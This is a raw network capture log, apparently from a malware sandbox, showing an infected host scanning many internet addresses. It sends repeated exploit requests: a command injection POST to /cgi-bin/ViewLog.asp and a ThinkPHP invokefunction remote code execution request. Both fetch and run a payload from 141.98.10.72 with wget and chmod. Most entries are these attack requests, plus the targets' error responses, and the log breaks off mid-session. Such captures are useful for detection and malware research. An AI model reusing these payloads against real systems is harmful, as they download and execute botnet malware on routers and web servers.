Feb 14, 2024 09:30:22.360661030 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:27.736474991 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:38.488404989 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:01.783591032 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:44.790559053 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
597	192.168.2.15	51256	119.29.120.222	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:17.587636948 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 38 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:48Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
598	192.168.2.15	46616	94.120.11.249	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:17.613161087 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
599	192.168.2.15	44092	31.200.108.28	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:17.614300966 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
600	192.168.2.15	51278	119.29.120.222	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:18.302009106 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:49Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
601	192.168.2.15	37846	88.212.218.18	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:19.189344883 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:19.424259901 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:19 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
602	192.168.2.15	50440	88.84.219.103	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:19.190524101 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:19.443593979 CET	78	IN	HTTP/1.1 400 Bad Request Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
603	192.168.2.15	53080	95.138.144.217	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:19.384540081 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:19.578082085 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:19 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
604	192.168.2.15	43940	95.111.242.79	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:19.400441885 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:19.610574007 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:19 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
605	192.168.2.15	58672	95.216.41.52	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:19.416264057 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:19.641463041 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:19 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
606	192.168.2.15	60290	95.158.24.64	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:19.417836905 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
607	192.168.2.15	43390	95.163.217.73	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:19.421155930 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:19.651289940 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:19 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
608	192.168.2.15	47848	95.165.230.10	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:19.435955048 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:19.681387901 CET	516	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Wed, 14 Feb 2024 08:30:17 GMT Server: lighttpd/1.4.31 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
609	192.168.2.15	60954	88.174.163.106	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:19.606172085 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
610	192.168.2.15	39818	88.99.97.116	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:19.609725952 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:19.819387913 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.25.2 Date: Wed, 14 Feb 2024 08:30:19 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
611	192.168.2.15	56122	95.181.129.220	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:19.657488108 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:19.935024977 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:19 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
612	192.168.2.15	44304	88.249.66.46	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:19.848334074 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:20.135513067 CET	70	IN	HTTP/1.1 404 Page not foundContent-Length: 0Connection: Keep-Alive Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
613	192.168.2.15	48694	85.214.76.136	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:20.122267962 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:20.345863104 CET	377	IN	HTTP/1.0 400 Bad Request Server: Icecast 2.4.4 Connection: Close Date: Wed, 14 Feb 2024 08:30:20 GMT Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store Expires: Mon, 26 Jul 1997 05:00:00 GMT Pragma: no-cache Access-Control-Allow-Origin: * Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 62 3e 34 30 30 20 2d 20 75 6e 6b 6e 6f 77 6e 20 72 65 71 75 65 73 74 3c 2f 62 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Error 400</title></head><body><b>400 - unknown request</b></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
614	192.168.2.15	51232	119.29.120.222	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:20.159456968 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:51Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
615	192.168.2.15	34838	62.68.75.20	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:20.323303938 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:20.522063017 CET	350	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 14 Feb 2024 08:30:20 GMT Content-Type: text/html; charset=utf-8 Content-Length: 146 Connection: keep-alive X-Frame-Options: SAMEORIGIN Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
616	192.168.2.15	56802	31.136.89.72	8080

Timestamp	Bytes transferred	Direction	Data
